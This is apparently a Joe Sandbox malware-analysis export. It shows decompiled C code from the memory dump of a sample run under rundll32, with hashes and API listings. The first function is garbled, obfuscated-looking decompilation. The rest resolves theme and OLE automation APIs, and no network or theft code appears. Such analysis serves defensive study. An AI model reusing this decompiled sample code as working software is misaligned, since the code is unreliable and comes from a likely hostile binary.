                          				if( &_a1 < 0) {
                          					L6:
                          					_t331 =  &(_t330[0]);
                          					 *_t331 = _t166;
                          					asm("in al, 0x46");
                          					 *_t331 =  *_t331 ^ _t331;
                          					_t357 = _t356 + 1;
                          					_t171 =  *_t331;
                          					 *_t171 =  *_t171 - _t171;
                          					 *_t171 =  *_t171 + _t171;
                          					 *_t331 =  *_t331 - _t331;
                          					 *_t331 = _t171;
                          					asm("les eax, [esi-0x7a]");
                          					_t173 =  *_t331 +  *( *_t331);
                          					 *_t173 =  *_t173 + _t173;
                          					 *((intOrPtr*)(_t331 + _t348)) =  *((intOrPtr*)(_t331 + _t348)) + _t173;
                          					 *_t331 = _t173;
                          					asm("hlt");
                          					_t332 = _t331 + 1;
                          					_t175 =  *_t332;
                          					 *_t332 =  *_t331;
                          					 *_t175 =  *_t175 + _t175;
                          					 *_t175 =  *_t175 + _t175;
                          					 *_t332 =  *_t332 & _t332;
                          					 *_t332 = _t175;
                          					asm("cld");
                          					_t177 =  *_t332;
                          					 *_t177 =  *_t177 + _t177;
                          					 *_t177 =  *_t177 + _t177;
                          					asm("sbb al, 0x32");
                          					 *_t332 = _t177;
                          					 *0x28642 =  *0x28642 + 0x28642;
                          					 *0x28642 =  *0x28642 + _t310;
                          					_t181 = (0x00028642 ^  *(_t348 - 0x79bc7ffe)) +  *0x28642;
                          					 *0x28642 =  *0x28642 + _t181;
                          					_t53 = _t332 + _t348;
                          					 *_t53 =  *((intOrPtr*)(_t332 + _t348)) + _t332;
                          					_t182 =  *_t332;
                          					 *_t332 = _t181;
                          					if( *_t53 < 0) {
                          						L9:
                          						 *(_t348 - 0x79b99ffe) =  *(_t348 - 0x79b99ffe) ^ _t182;
                          						_t183 = _t182 +  *_t182;
                          						 *_t183 =  *_t183 + _t183;
                          						_t184 = _t183 + _t310;
                          						 *(_t348 - 0x79b9b7fe) =  *(_t348 - 0x79b9b7fe) ^ _t184;
                          						_t185 = _t184 +  *_t184;
                          						 *_t185 =  *_t185 + _t185;
                          						_t186 = _t185 + _t332;
                          						 *(_t348 - 0x79ba4bfe) =  *(_t348 - 0x79ba4bfe) ^ _t186;
                          						_t187 = _t186 +  *_t186;
                          						 *_t187 =  *_t187 + _t187;
                          						_t188 = _t187 + _t332;
                          						 *(_t348 - 0x79bb8bfe) =  *(_t348 - 0x79bb8bfe) ^ _t188;
                          						_t189 = _t188 +  *_t188;
                          						 *_t189 =  *_t189 + _t189;
                          						_t190 = _t189 + _t316;
                          						L10:
                          						 *(_t348 - 0x79bbf7fe) =  *(_t348 - 0x79bbf7fe) ^ _t190;
                          						_t191 = _t190 +  *_t190;
                          						 *_t191 =  *_t191 + _t191;
                          						_t192 = _t191 + _t316;
                          						 *(_t348 - 0x79bd4bfe) =  *(_t348 - 0x79bd4bfe) ^ _t192;
                          						_t193 = _t192 +  *_t192;
                          						 *_t193 =  *_t193 + _t193;
                          						_t194 = _t193 + _t193;
                          						 *(_t348 - 0x79b9bbfe) =  *(_t348 - 0x79b9bbfe) ^ _t194;
                          						_t195 = _t194 +  *_t194;
                          						 *_t195 =  *_t195 + _t195;
                          						_t196 = _t195 + _t195;
                          						 *(_t348 - 0x79bad3fe) =  *(_t348 - 0x79bad3fe) ^ _t196;
                          						_t197 = _t196 +  *_t196;
                          						 *_t197 =  *_t197 + _t197;
                          						_t198 = _t197 + _t310;
                          						 *(_t348 - 0x79bc0bfe) =  *(_t348 - 0x79bc0bfe) ^ _t198;
                          						_t199 = _t198 +  *_t198;
                          						 *_t199 =  *_t199 + _t199;
                          						_t200 = _t199 + _t310;
                          						 *(_t348 - 0x79bb03fe) =  *(_t348 - 0x79bb03fe) ^ _t200;
                          						_t201 = _t200 +  *_t200;
                          						 *_t201 =  *_t201 + _t201;
                          						_t202 = _t201 + _t332;
                          						 *(_t348 - 0x79ba7ffe) =  *(_t348 - 0x79ba7ffe) ^ _t202;
                          						_t203 = _t202 +  *_t202;
                          						 *_t203 =  *_t203 + _t203;
                          						_t204 = _t203 + _t332;
                          						 *(_t348 - 0x79baebfe) =  *(_t348 - 0x79baebfe) ^ _t204;
                          						_t205 = _t204 +  *_t204;
                          						 *_t205 =  *_t205 + _t205;
                          						_t206 = _t205 + _t316;
                          						 *(_t348 - 0x79bbc7fe) =  *(_t348 - 0x79bbc7fe) ^ _t206;
                          						_t207 = _t206 +  *_t206;
                          						 *_t207 =  *_t207 + _t207;
                          						_t208 = _t207 + _t316;
                          						 *(_t348 - 0x79bd4ffe) =  *(_t348 - 0x79bd4ffe) ^ _t208;
                          						_t209 = _t208 +  *_t208;
                          						 *_t209 =  *_t209 + _t209;
                          						_t210 = _t209 + _t209;
                          						 *(_t348 - 0x79bb4bfe) =  *(_t348 - 0x79bb4bfe) ^ _t210;
                          						_t211 = _t210 +  *_t210;
                          						 *_t211 =  *_t211 + _t211;
                          						_t212 = _t211 + _t211;
                          						 *(_t348 - 0x79b8fffe) =  *(_t348 - 0x79b8fffe) ^ _t212;
                          						_t213 = _t212 +  *_t212;
                          						 *_t213 =  *_t213 + _t213;
                          						 *((intOrPtr*)(_t316 + _t348 + 0x46ac0286)) =  *((intOrPtr*)(_t316 + _t348 + 0x46ac0286)) + _t310;
                          						_t214 =  *_t332;
                          						 *_t332 = _t213;
                          						 *_t214 =  *_t214 + _t214;
                          						 *_t214 =  *_t214 + _t214;
                          						_t216 =  *_t332;
                          						 *_t332 = 0x64028631;
                          						 *0x64028631 =  *0x64028631 + _t216;
                          						 *0x64028631 =  *0x64028631 + _t216;
                          						 *_t332 = 0x31;
                          						asm("lodsb");
                          						_t219 =  *_t332;
                          						 *0x64028631 =  *0x64028631 + _t219;
                          						 *0x64028631 =  *0x64028631 + _t219;
                          						 *_t332 = 0x31;
                          						asm("les eax, [edx-0x7a]");
                          						_t222 =  *_t332 +  *0x64028631;
                          						 *0x64028631 =  *0x64028631 + _t222;
                          						 *((intOrPtr*)(_t316 + _t348 + 0x46980286)) =  *((intOrPtr*)(_t316 + _t348 + 0x46980286)) + _t316;
                          						_t223 =  *_t332;
                          						 *_t332 = _t222;
                          						 *0x64028631 =  *0x64028631 + _t223;
                          						 *0x64028631 =  *0x64028631 + _t223;
                          						 *_t332 = _t223;
                          						_t225 =  *0x28647;
                          						 *0x64028631 =  *0x64028631 + _t225;
                          						 *((intOrPtr*)(_t316 + _t348 + 0x43140286)) =  *((intOrPtr*)(_t316 + _t348 + 0x43140286)) + _t225;
                          						_t226 =  *_t332;
                          						 *_t332 = _t225;
                          						 *0x64028631 =  *0x64028631 + _t226;
                          						 *0x64028631 =  *0x64028631 + _t226;
                          						_t333 = _t332 + 1;
                          						_t228 =  *_t333;
                          						 *_t333 =  *0x9c028631;
                          						 *0x64028631 =  *0x64028631 + _t228;
                          						 *0x64028631 =  *0x64028631 + _t228;
                          						asm("pushfd");
                          						 *(_t348 - 0x79b927fe) =  *(_t348 - 0x79b927fe) ^ 0x64028631;
                          						_t229 = _t228 +  *0x64028631;
                          						 *0x64028631 =  *0x64028631 + _t229;
                          						 *0xC4050C62 =  *((intOrPtr*)(0xc4050c62)) + _t310 + 1;
                          						_t230 =  *_t333;
                          						 *_t333 = _t229;
                          						 *0x64028631 =  *0x64028631 + _t230;
                          						 *0x64028631 =  *0x64028631 + _t230;
                          						_t231 = _t357;
                          						 *(_t348 - 0x79b8c3fe) =  *(_t348 - 0x79b8c3fe) ^ _t231;
                          						_t232 = _t231 +  *_t231;
                          						 *_t232 =  *_t232 + _t232;
                          						 *((intOrPtr*)(_t232 + 0x31)) =  *((intOrPtr*)(_t232 + 0x31)) + _t333;
                          						 *_t333 = _t232;
                          						asm("pushfd");
                          						_t359 = _t230 + 1;
                          						_t234 =  *_t333;
                          						 *_t234 =  *_t234 + _t234;
                          						 *_t234 =  *_t234 + _t234;
                          						asm("insb");
                          						 *(_t348 - 0x79bc43fe) =  *(_t348 - 0x79bc43fe) ^ _t234;
                          						 *((intOrPtr*)(_t234 +  *_t234)) =  *((intOrPtr*)(_t234 +  *_t234)) + _t234 +  *_t234;
                          						_v117 = _v117 + _t333;
                          						_push( &_a1);
                          						_push(_t359);
                          						_push(0x27ddc49);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t359;
                          						 *0x2865798 =  *0x2865798 + 1;
                          						if( *0x2865798 == 0) {
                          							E027DD220(E027DD6B4(0x28657a4));
                          							E027DC34C();
                          							_t335 =  *0x27dbe24; // 0x27dbe28
                          							E027D4BBC(0x2863264, 0x16, _t335);
                          							_t336 =  *E027DBDA4; // 0x27dbda8
                          							E027D4BBC(0x286322c, 7, _t336);
                          							_t337 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x2863144, 2, _t337);
                          							E027D40E8(0x286313c);
                          							_t338 =  *0x27d7f60; // 0x27d7f64
                          							E027D548C(0x2865794, _t338);
                          							_t339 =  *0x27d7f3c; // 0x27d7f40
                          							E027D548C(0x2865790, _t339);
                          							_t340 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x2865758, 7, _t340);
                          							_t341 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x286572c, 7, _t341);
                          							_t342 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x2865710, 7, _t342);
                          							_t343 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x28656e0, 0xc, _t343);
                          							_t344 =  *0x27d10cc; // 0x27d10d0
                          							E027D4BBC(0x28656b0, 0xc, _t344);
                          							E027D40E8(0x28656ac);
                          							E027D40E8(0x28656a8);
                          							E027D40E8(0x28656a4);
                          							E027D40E8(0x28656a0);
                          							E027D40E8(0x2865698);
                          							E027D40E8(0x2865694);
                          							E027D40E8(0x2865688);
                          							E027D40E8(0x28630e4);
                          							E027D47F4(0x28630d0);
                          							E027D40E8(0x28630cc);
                          						}
                          						_pop(_t334);
                          						 *[fs:eax] = _t334;
                          						_push(E027DDC50);
                          						return 0;
                          					}
                          					_t284 =  *_t332;
                          					 *_t332 = _t182;
                          					 *0x28642 =  *0x28642 + _t284;
                          					 *0x28642 =  *0x28642 + _t284;
                          					asm("adc [edx], dh");
                          					_t285 =  *_t332;
                          					 *_t332 = _t284;
                          					 *(_t310 - 0x7a) =  *(_t310 - 0x7a) | _t285;
                          					_t286 = _t285 +  *0x28642;
                          					 *0x28642 =  *0x28642 + _t286;
                          					 *((intOrPtr*)(_t332 + _t348)) =  *((intOrPtr*)(_t332 + _t348)) + _t316;
                          					_t287 =  *_t332;
                          					 *_t332 = _t286;
                          					 *((intOrPtr*)(_t348 + 0xa190a)) = es;
                          					 *0x28642 =  *0x28642 + _t287;
                          					 *0x28642 =  *0x28642 + _t287;
                          					 *_t332 =  *_t332 | _t332;
                          					 *_t332 = _t287;
                          					_t290 =  *_t332;
                          					 *_t332 = 0x28642;
                          					 *0x28642 =  *0x28642 + _t290;
                          					 *0x28642 =  *0x28642 + _t290;
                          					_t291 = _t290 + 0x32;
                          					_t190 =  *_t332;
                          					 *_t332 = _t291;
                          					if(_t291 < 0) {
                          						goto L10;
                          					}
                          					_t292 =  *_t332;
                          					 *_t332 = _t190;
                          					 *0x28642 =  *0x28642 + _t292;
                          					 *0x28642 =  *0x28642 + _t292;
                          					 *_t332 =  *_t332 + _t332;
                          					_t293 =  *_t332;
                          					 *_t332 = _t292;
                          					_push(0x28645);
                          					 *0x28642 =  *0x28642 + _t293;
                          					_t182 = _t293 + _t310;
                          					goto L9;
                          				}
                          				 *_t330 = _t166;
                          				 *_t330 =  *_t330 ^ 0x00000086;
                          				_t362 = _t346 + 1;
                          				_t296 =  *_t330;
                          				 *_t330 =  *_t330 +  *( *_t330);
                          				if(_t362 < 0) {
                          					L4:
                          					asm("sbb [esi-0x7a], al");
                          					_t166 =  *_t330;
                          					 *_t330 = _t296 +  *((intOrPtr*)(_t296 + 0x32));
                          					L5:
                          					asm("lodsb");
                          					goto L6;
                          				}
                          				 *_t330 = _t296;
                          				_t299 = _t356;
                          				_t356 =  *_t330 + 1;
                          				_t166 =  *_t330;
                          				 *_t330 = _t299;
                          				if(_t362 < 0) {
                          					goto L5;
                          				}
                          				 *_t330 = _t166;
                          				asm("lock inc esi");
                          				_push(0xfc028632);
                          				_t348 = __esi + 1;
                          				asm("pushad");
                          				_t303 =  *_t330 ^  *(_t348 - 0x79bc4ffe);
                          				 *_t330 = _t303;
                          				_pop(_t356);
                          				_t310 = _t310 +  *((intOrPtr*)(_t303 + 0x32)) + 1;
                          				_t305 =  *_t330;
                          				_push(_t305);
                          				_t306 = _t305 ^  *(_t348 - 0x79ba8ffe);
                          				_t316 = _t316 +  *((intOrPtr*)(_t306 + 0x32));
                          				_t296 =  *_t330;
                          				 *_t330 = _t306;
                          				goto L4;
                          			}
                          0x027dda33
                          0x027dda35
                          0x027dda37
                          0x027dda3e
                          0x027dda3e
                          0x027dda40
                          0x027dda42
                          0x027dda4a
                          0x027dda4a
                          0x027dda4c
                          0x027dda4e
                          0x027dda52
                          0x027dda54
                          0x027dda56
                          0x027dda58
                          0x027dda5a
                          0x027dda5e
                          0x027dda60
                          0x027dda63
                          0x027dda65
                          0x027dda67
                          0x027dda6e
                          0x027dda6e
                          0x027dda70
                          0x027dda72
                          0x027dda76
                          0x027dda78
                          0x027dda7d
                          0x027dda7f
                          0x027dda86
                          0x027dda86
                          0x027dda88
                          0x027dda8a
                          0x027dda91
                          0x027dda92
                          0x027dda92
                          0x027dda94
                          0x027dda96
                          0x027dda98
                          0x027dda99
                          0x027dda9f
                          0x027ddaa1
                          0x027ddaa3
                          0x027ddaaa
                          0x027ddaaa
                          0x027ddaac
                          0x027ddaae
                          0x027ddab0
                          0x027ddab1
                          0x027ddab7
                          0x027ddab9
                          0x027ddabb
                          0x027ddabe
                          0x027ddac0
                          0x027ddac1
                          0x027ddac2
                          0x027ddac4
                          0x027ddac6
                          0x027ddac8
                          0x027ddac9
                          0x027ddad1
                          0x027ddad3
                          0x027ddad4
                          0x027ddad9
                          0x027ddada
                          0x027ddadf
                          0x027ddae2
                          0x027ddae5
                          0x027ddaeb
                          0x027ddafb
                          0x027ddb00
                          0x027ddb0f
                          0x027ddb15
                          0x027ddb24
                          0x027ddb2a
                          0x027ddb39
                          0x027ddb3f
                          0x027ddb49
                          0x027ddb53
                          0x027ddb59
                          0x027ddb63
                          0x027ddb69
                          0x027ddb78
                          0x027ddb7e
                          0x027ddb8d
                          0x027ddb93
                          0x027ddba2
                          0x027ddba8
                          0x027ddbb7
                          0x027ddbbd
                          0x027ddbcc
                          0x027ddbd2
                          0x027ddbdc
                          0x027ddbe6
                          0x027ddbf0
                          0x027ddbfa
                          0x027ddc04
                          0x027ddc0e
                          0x027ddc18
                          0x027ddc22
                          0x027ddc2c
                          0x027ddc36
                          0x027ddc36
                          0x027ddc3d
                          0x027ddc40
                          0x027ddc43
                          0x00000000
                          0x027ddc43
                          0x027dd936
                          0x027dd936
                          0x027dd938
                          0x027dd93a
                          0x027dd93c
                          0x027dd93e
                          0x027dd93e
                          0x027dd940
                          0x027dd943
                          0x027dd945
                          0x027dd947
                          0x027dd94a
                          0x027dd94a
                          0x027dd94c
                          0x027dd950
                          0x027dd952
                          0x027dd954
                          0x027dd956
                          0x027dd95a
                          0x027dd95a
                          0x027dd95c
                          0x027dd95e
                          0x027dd960
                          0x027dd962
                          0x027dd962
                          0x027dd964
                          0x00000000
                          0x00000000
                          0x027dd966
                          0x027dd966
                          0x027dd968
                          0x027dd96a
                          0x027dd96c
                          0x027dd96e
                          0x027dd96e
                          0x027dd970
                          0x027dd975
                          0x027dd977
                          0x00000000
                          0x027dd977
                          0x027dd896
                          0x027dd898
                          0x027dd89d
                          0x027dd89e
                          0x027dd89e
                          0x027dd8a0
                          0x027dd8d4
                          0x027dd8d4
                          0x027dd8da
                          0x027dd8da
                          0x027dd8dc
                          0x027dd8dc
                          0x00000000
                          0x027dd8dc
                          0x027dd8a2
                          0x027dd8a4
                          0x027dd8a5
                          0x027dd8a6
                          0x027dd8a6
                          0x027dd8a8
                          0x00000000
                          0x00000000
                          0x027dd8aa
                          0x027dd8ac
                          0x027dd8b0
                          0x027dd8b5
                          0x027dd8b8
                          0x027dd8b9
                          0x027dd8c2
                          0x027dd8c4
                          0x027dd8c5
                          0x027dd8c6
                          0x027dd8c8
                          0x027dd8c9
                          0x027dd8cf
                          0x027dd8d2
                          0x027dd8d2
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c439408b3853af2e6e14f790e4b82cd9585d9e5050886c4e26f5458f70792ad8
                          • Instruction ID: 46d6771db006d213298d23c8bdf6749f5c000456acb3a883d746852d9916bf95
                          • Opcode Fuzzy Hash: c439408b3853af2e6e14f790e4b82cd9585d9e5050886c4e26f5458f70792ad8
                          • Instruction Fuzzy Hash: 36E12A2914E3D24FE7139BB888656A6BFB1CF4721038A44EFD0D2CF1A3C459486ED766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E02800828(void* __ebx, void* __ecx) {
                          				char _v5;
                          				intOrPtr _t2;
                          				intOrPtr _t6;
                          				intOrPtr _t108;
                          				intOrPtr _t111;
                          
                          				_t2 =  *0x2865a50; // 0x41d0b80
                          				E02800620(_t2);
                          				_push(_t111);
                          				_push(0x2800bdb);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t111;
                          				 *0x2865a4c =  *0x2865a4c + 1;
                          				if( *0x2865a48 == 0) {
                          					 *0x2865a48 = LoadLibraryA("uxtheme.dll");
                          					if( *0x2865a48 > 0) {
                          						 *0x2865988 = GetProcAddress( *0x2865a48, "OpenThemeData");
                          						 *0x286598c = GetProcAddress( *0x2865a48, "CloseThemeData");
                          						 *0x2865990 = GetProcAddress( *0x2865a48, "DrawThemeBackground");
                          						 *0x2865994 = GetProcAddress( *0x2865a48, "DrawThemeText");
                          						 *0x2865998 = GetProcAddress( *0x2865a48, "GetThemeBackgroundContentRect");
                          						 *0x286599c = GetProcAddress( *0x2865a48, "GetThemeBackgroundContentRect");
                          						 *0x28659a0 = GetProcAddress( *0x2865a48, "GetThemePartSize");
                          						 *0x28659a4 = GetProcAddress( *0x2865a48, "GetThemeTextExtent");
                          						 *0x28659a8 = GetProcAddress( *0x2865a48, "GetThemeTextMetrics");
                          						 *0x28659ac = GetProcAddress( *0x2865a48, "GetThemeBackgroundRegion");
                          						 *0x28659b0 = GetProcAddress( *0x2865a48, "HitTestThemeBackground");
                          						 *0x28659b4 = GetProcAddress( *0x2865a48, "DrawThemeEdge");
                          						 *0x28659b8 = GetProcAddress( *0x2865a48, "DrawThemeIcon");
                          						 *0x28659bc = GetProcAddress( *0x2865a48, "IsThemePartDefined");
                          						 *0x28659c0 = GetProcAddress( *0x2865a48, "IsThemeBackgroundPartiallyTransparent");
                          						 *0x28659c4 = GetProcAddress( *0x2865a48, "GetThemeColor");
                          						 *0x28659c8 = GetProcAddress( *0x2865a48, "GetThemeMetric");
                          						 *0x28659cc = GetProcAddress( *0x2865a48, "GetThemeString");
                          						 *0x28659d0 = GetProcAddress( *0x2865a48, "GetThemeBool");
                          						 *0x28659d4 = GetProcAddress( *0x2865a48, "GetThemeInt");
                          						 *0x28659d8 = GetProcAddress( *0x2865a48, "GetThemeEnumValue");
                          						 *0x28659dc = GetProcAddress( *0x2865a48, "GetThemePosition");
                          						 *0x28659e0 = GetProcAddress( *0x2865a48, "GetThemeFont");
                          						 *0x28659e4 = GetProcAddress( *0x2865a48, "GetThemeRect");
                          						 *0x28659e8 = GetProcAddress( *0x2865a48, "GetThemeMargins");
                          						 *0x28659ec = GetProcAddress( *0x2865a48, "GetThemeIntList");
                          						 *0x28659f0 = GetProcAddress( *0x2865a48, "GetThemePropertyOrigin");
                          						 *0x28659f4 = GetProcAddress( *0x2865a48, "SetWindowTheme");
                          						 *0x28659f8 = GetProcAddress( *0x2865a48, "GetThemeFilename");
                          						 *0x28659fc = GetProcAddress( *0x2865a48, "GetThemeSysColor");
                          						 *0x2865a00 = GetProcAddress( *0x2865a48, "GetThemeSysColorBrush");
                          						 *0x2865a04 = GetProcAddress( *0x2865a48, "GetThemeSysBool");
                          						 *0x2865a08 = GetProcAddress( *0x2865a48, "GetThemeSysSize");
                          						 *0x2865a0c = GetProcAddress( *0x2865a48, "GetThemeSysFont");
                          						 *0x2865a10 = GetProcAddress( *0x2865a48, "GetThemeSysString");
                          						 *0x2865a14 = GetProcAddress( *0x2865a48, "GetThemeSysInt");
                          						 *0x2865a18 = GetProcAddress( *0x2865a48, "IsThemeActive");
                          						 *0x2865a1c = GetProcAddress( *0x2865a48, "IsAppThemed");
                          						 *0x2865a20 = GetProcAddress( *0x2865a48, "GetWindowTheme");
                          						 *0x2865a24 = GetProcAddress( *0x2865a48, "EnableThemeDialogTexture");
                          						 *0x2865a28 = GetProcAddress( *0x2865a48, "IsThemeDialogTextureEnabled");
                          						 *0x2865a2c = GetProcAddress( *0x2865a48, "GetThemeAppProperties");
                          						 *0x2865a30 = GetProcAddress( *0x2865a48, "SetThemeAppProperties");
                          						 *0x2865a34 = GetProcAddress( *0x2865a48, "GetCurrentThemeName");
                          						 *0x2865a38 = GetProcAddress( *0x2865a48, "GetThemeDocumentationProperty");
                          						 *0x2865a3c = GetProcAddress( *0x2865a48, "DrawThemeParentBackground");
                          						 *0x2865a40 = GetProcAddress( *0x2865a48, "EnableTheming");
                          					}
                          				}
                          				_v5 =  *0x2865a48 > 0;
                          				_pop(_t108);
                          				 *[fs:eax] = _t108;
                          				_push(0x2800be2);
                          				_t6 =  *0x2865a50; // 0x41d0b80
                          				return E02800628(_t6);
                          			}









                          APIs
                          • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,02800BDB), ref: 0280085E
                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 02800876
                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 02800888
                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0280089A
                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 028008AC
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 028008BE
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 028008D0
                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 028008E2
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 028008F4
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 02800906
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 02800918
                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0280092A
                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0280093C
                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0280094E
                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 02800960
                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 02800972
                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 02800984
                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 02800996
                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 028009A8
                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 028009BA
                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 028009CC
                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 028009DE
                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 028009F0
                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 02800A02
                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 02800A14
                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 02800A26
                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 02800A38
                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 02800A4A
                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 02800A5C
                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 02800A6E
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 02800A80
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 02800A92
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 02800AA4
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 02800AB6
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 02800AC8
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 02800ADA
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 02800AEC
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 02800AFE
                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 02800B10
                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 02800B22
                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 02800B34
                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 02800B46
                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 02800B58
                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 02800B6A
                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 02800B7C
                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 02800B8E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 02800BA0
                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 02800BB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                          • API String ID: 2238633743-2910565190
                          • Opcode ID: 565d4dd986347fdb7643646f6842be20b1c72b08eca56dfebb0779d59c91e806
                          • Instruction ID: 34cf1d00398bab184d9464cf9de79ec374b8c06d37f13f2a6f96d20b1d9d286a
                          • Opcode Fuzzy Hash: 565d4dd986347fdb7643646f6842be20b1c72b08eca56dfebb0779d59c91e806
                          • Instruction Fuzzy Hash: BFA19CFCE91750AFFB51EBA4FCC9E253BAAEB1A7017402965E401DF284D6799810CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DE1AC() {
                          				struct HINSTANCE__* _v8;
                          				intOrPtr _t46;
                          				void* _t91;
                          
                          				_v8 = GetModuleHandleA("oleaut32.dll");
                          				 *0x28657a8 = E027DE180("VariantChangeTypeEx", E027DDCFC, _t91);
                          				 *0x28657ac = E027DE180("VarNeg", E027DDD2C, _t91);
                          				 *0x28657b0 = E027DE180("VarNot", E027DDD2C, _t91);
                          				 *0x28657b4 = E027DE180("VarAdd", E027DDD38, _t91);
                          				 *0x28657b8 = E027DE180("VarSub", E027DDD38, _t91);
                          				 *0x28657bc = E027DE180("VarMul", E027DDD38, _t91);
                          				 *0x28657c0 = E027DE180("VarDiv", E027DDD38, _t91);
                          				 *0x28657c4 = E027DE180("VarIdiv", E027DDD38, _t91);
                          				 *0x28657c8 = E027DE180("VarMod", E027DDD38, _t91);
                          				 *0x28657cc = E027DE180("VarAnd", E027DDD38, _t91);
                          				 *0x28657d0 = E027DE180("VarOr", E027DDD38, _t91);
                          				 *0x28657d4 = E027DE180("VarXor", E027DDD38, _t91);
                          				 *0x28657d8 = E027DE180("VarCmp", E027DDD44, _t91);
                          				 *0x28657dc = E027DE180("VarI4FromStr", E027DDD50, _t91);
                          				 *0x28657e0 = E027DE180("VarR4FromStr", E027DDDBC, _t91);
                          				 *0x28657e4 = E027DE180("VarR8FromStr", E027DDE28, _t91);
